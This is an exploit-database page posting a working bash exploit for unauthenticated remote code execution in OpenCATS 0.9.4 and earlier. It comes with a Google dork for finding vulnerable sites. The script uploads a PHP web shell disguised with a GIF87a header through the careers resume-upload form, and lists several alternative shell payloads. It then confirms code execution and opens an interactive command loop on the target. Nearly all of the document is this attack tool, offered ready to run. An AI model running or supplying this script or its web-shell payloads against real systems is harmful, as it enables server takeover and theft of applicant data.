OpenCATS 0.9.4 Remote Code Execution

2021.12.10

Credit: Nicholas Ferreira

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Current Available Openings, Recently Posted Jobs"

# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server
#!/bin/bash
if [ $# -eq 0 ]
then
echo "Usage: $0 <target URL>"
exit
fi
# if a payload doesn't work, try another
payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'
target=$1
green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"
#====================== Functions
rev() {
while true
do echo -n -e "\n$ "
read cmd
curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
done
}
upload() {
curl -skL $1/$2 \
-H "Connection: close" \
-F resumeFile=@"$3;type=application/x-php" \
-F ID="$firstJb" \
-F candidateID="-1" \
-F applyToJobSubAction="resumeLoad" \
--compressed \
--insecure
}
getVersion() {
ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
if [ -z "${ver}" ]
then
ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
if [ -z "${ver}" ]
then
echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
return 0
fi
fi
echo -e "${green}[*] Version detected: $ver${reset}"
}
writePayload(){
tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
file=`basename $tmpfile`
echo "$1" > $tmpfile
}
banner(){
echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
echo -e "\n"
}
#======================
banner
echo "[*] Attacking target $target"
echo "[*] Checking CATS version..."
getVersion $target
#exit
echo "[*] Creating temp file with payload..."
writePayload "$payload"
#exit
echo "[*] Checking active jobs..."
jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] No active jobs found.${reset}"
echo "[*] Trying another path..."
jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] Couldn't find any active job.${reset}"
exit
fi
fi
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
echo "[*] Sending payload..."
req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
echo "[*] Checking by another method..."
sed -i "s/GIF87a//" $tmpfile
req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't upload payload...${reset}"
exit
fi
fi
echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
rm $tmpfile
echo "[*] Checking shell..."
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if `echo $check | grep -q "0x7359"`
then
echo -e "${green}[+] Got shell! :D${reset}"
curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
rev $target/upload/careerportaladd/$file
else
echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

OpenCATS 0.9.4 Remote Code Execution

Dork: intext:"Current Available Openings, Recently Posted Jobs"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.